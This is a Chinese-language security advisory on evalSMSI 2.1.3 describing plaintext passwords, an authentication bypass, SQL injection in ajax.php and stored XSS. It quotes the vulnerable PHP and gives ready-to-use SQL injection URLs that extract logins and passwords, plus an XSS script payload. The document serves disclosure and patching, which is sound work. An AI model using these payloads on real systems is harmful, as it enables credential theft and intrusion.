发布日期：2010-02-05
更新日期：2010-02-08

受影响系统：

evalSMSI evalSMSI 2.1.3

不受影响系统：

evalSMSI evalSMSI 2.2

描述：

---

BUGTRAQ  ID: 38116

evalSMSI是用PHP/MySQL开发的WEB应用，用于评估信息安全管理系统。

evalsmsi中存在多个输入验证和明文口令等安全漏洞，远程攻击者可以利用这些漏洞获得非授权访问或执行SQL注入、跨站脚本等攻击。

1 - 不安全口令存储

数据库中以明文存储了口令：

table : authentification
column: password

2 - 绕过认证

用户可通过ajax.php提交某些请求，这样就无需认证便获得了对应用的访问。

3 - SQL注入

可通过向ajax.php脚本提交恶意参数请求执行跨站脚本攻击。以下是有漏洞的代码段：

$id = $_GET['query'];
$action = $_GET['action'];

$base = evalsmsiConnect();
switch ($action) {
case 'sub_par':
$request = "SELECT MAX(numero) FROM sub_paragraphe WHERE id_paragraphe="$id"";
break;
case 'question':
$request = "SELECT * FROM sub_paragraphe WHERE id_paragraphe="$id"";
break;
case 'num_quest':
$request = "SELECT MAX(numero) FROM question WHERE id_sub_paragraphe="$id"";
break;
default:
break;

4 - 跨站脚本

可向报表的标注框中注入JavaScript，执行存储式跨站脚本攻击。

<*来源：ekse
  
  链接：http://marc.info/?l=full-disclosure&m=126537085630095&q=p3
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22
http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22

</textarea><script>alert('XSS found by Corelan Team');</script>

建议：

---

厂商补丁：

evalSMSI
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://sourceforge.net/projects/evalsmsi/

浏览次数：2600
严重程度：0（网友投票）